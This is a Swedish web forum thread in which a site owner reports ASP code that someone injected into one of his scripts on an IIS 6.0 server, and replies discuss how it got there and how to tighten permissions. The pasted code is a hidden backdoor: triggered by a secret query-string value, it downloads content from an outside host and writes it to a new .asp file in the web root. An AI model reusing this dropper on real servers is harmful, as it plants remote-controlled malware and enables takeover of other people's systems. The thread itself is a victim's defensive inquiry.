Hej,
Idag när jag skulle ändra en banner på min ena fil så märkte jag en asp text som inte jag har skrivit.
Den ledde till någon xlm fil för att kunna ladda upp filer på min server.

Deras script ledde till denna xlm fil:
http://max.wal.ifrance.com/asp.txt

Min fråga är, hur gick detta till och hur skyddar jag mig mot dessa idiot folk?
Jag har en egen dedicerande server med IIS 6.0

Tacksam för svar.

så såg koden ut i min fil:

<code>
<%
If Request.QueryString("kat") = "max007" Then
%>

<%Response.Buffer = true%>
<%Dim objXMLHTTP, xml, text%>
<%Set xml = Server.CreateObject ("Microsoft.XMLHTTP")%>
<%xml.Open "GET", "http://max.wal.ifrance.com/asp.txt", false%>
<%xml.Send%>
<%text = xml.ResponseText%><%Response.write(text)%>
<%dim fs,tfile%>
<%set fs=Server.CreateObject("Scripting.FileSystemObject")%>
<%set tfile=fs.CreateTextFile("c:\inetpub\wwwroot\ara\images\errors.asp")%><%tfile.WriteLine(text)%><%tfile.close%>
<%set tfile=nothing%>
<%set fs=nothing%>
<%Set xml = Nothing%>
<% End If %>
</code>

En vild gissning bara... Kan det vara så att du tillåter filuppladdning till servern utan att kontrollera filändelsen? Tillåter du exekvering av script i mappen filerna laddas upp till? Om så är fallet kan någon ladda upp en asp-fil och sedan exekvera den, angriparen kan alltså göra "allt" på din server.

Om någon av dina asp-filer är modifierade så tyder det också på att du har lite tokiga rättigheter. Användaren som IIS kör under ska INTE ha tillåtelse att skriva tilll filer i mappar där din website ligger (enbart till mappar där du sparar uppladdat material.

/Johan

Hej,
Jag tillåter endast uppladdning av bild, och där tillåts endast jpg och gif.
Det som har hänt är att han modifierat ett av mina egna asp script och lagt till denna kodsnutt.

jag har ändrat nu i min wwwroot katalog att endast Read, logg visits och index this resource är tillåten, innan fanns write med, men den har jag avmarkerat nu.